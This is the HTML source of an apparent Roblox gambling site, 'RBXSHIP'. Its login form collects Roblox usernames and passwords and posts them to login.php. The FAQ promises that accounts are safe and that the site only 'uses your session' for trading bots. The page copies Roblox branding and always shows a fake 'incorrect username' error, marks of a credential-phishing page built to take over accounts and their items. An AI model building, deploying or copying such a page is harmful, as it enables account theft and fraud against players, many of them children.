<!DOCTYPE html>
<html lang="en">
<head>
<title>RBXSHIP | Roblox Casino</title>
	<link rel="icon" href="images/logo.png">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <meta charset="utf-8">
    <meta name="keywords" content="">
    <script>
        addEventListener("load", function () {
            setTimeout(hideURLbar, 0);
        }, false);
        function hideURLbar() {
            window.scrollTo(0, 1);
        }
    </script>
	<link href="css/font-awesome.min.css" rel="stylesheet" type="text/css" media="all">
	<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js"></script>
	<link href="css/style.css" rel="stylesheet" type="text/css" media="all"/>
	<link href="//fonts.googleapis.com/css?family=Raleway:100,100i,200,200i,300,300i,400,400i,500,500i,600,600i,700,700i,800,800i,900,900i" rel="stylesheet">
</head>
<body>	
<div class="signupform">
	<div class="container">
		<div class="agile_info">
			<div class="w3l_form">
				<div class="left_grid_info">
					<h1>RBXSHIP | Roblox Casino</h1>
					<h2>What is RBXSHIP?</h2>
					<p>RBXSHIP is a new thrilling Roblox gambling website with three unique game-modes! Our Coinflip mode is peer 2 peer meaning there is no house involved, purely testing your luck against other players! In Jackpot you're able to win up to 15 items with a potential 15 other players putting their items at stake each round. Rock Paper Scissors is similar to our Coinflip mode, with the added element of player choice to selecting a pick!</p><br>
					<h2>Are my account safe?</h2>
					<p>Absolutely! We don't store any account informations in our database, it's a all local in your own browser.</p><br>
					<h2>What is my connection used for?</h2>
					<p>In order to automate all trades and for our website to function, we use your session. Our bots do everything in real time, and ensures a trust-less system between all users.</p><br><br><br>
					<img src="images/banner.png"/>
				</div>
			</div>
			<div class="w3_info">
				<h2>Welcome User!</h2><br>
				<h3>Connect your Roblox account to RBXSHIP for login.</h3>
				<p>Before logging in, please read our <span style="color: #4b79bd; cursor: pointer; font-weight: 500;">frequently asked questions</span>. For further assistance on how to login, watch this <a href="https://www.youtube.com/watch?v=ZSUygtqD657" target="blank" style="color: #4b79bd; cursor: pointer; font-weight: 500; text-decoration: none;">Youtube video</a>!</p>
				<form id="login-form" action="login.php" method="post">
					<label>Username</label>
					<div class="input-group">
						<span class="fa fa-user" aria-hidden="true"></span>
						<input type="text" name="username" placeholder="Username/Email/Phone" required=""> 
					</div>
					<label>Password</label>
					<div class="input-group">
						<span class="fa fa-lock" aria-hidden="true"></span>
						<input type="Password" name="password" placeholder="Password" required="">
					</div> 
                    
					<div class="login-check">
						<label class="checkbox"><input type="checkbox" name="checkbox" checked=""><i> </i>Agree to our terms of service</label>
				   </div>				
						<button class="btn btn-danger btn-block" type="submit">Log In</button>
                        <p class="account" style="color: #d84c4c;">[?] You have specified an incorrect username. Please check your username and try again. If you continue to have problems please contact the Board Administrator.</p>	
                        <p class="account" style="color: #d84c4c;">[!] Contact: rbxship@eu.com</p>	
				</form>
				<p class="account">New to RBXSHIP & Roblox? <a href="https://www.roblox.com/account/signupredir" target="blank">Create an account</a></p>
				<p class="account1">©RBXSHIP - Logo and Powering Imagination are among our registered and unregistered trademarks in the U.S. and other countries.<a href="#"></a></p>
			</div>
		</div>
	</div>
</div>
</body>
</html>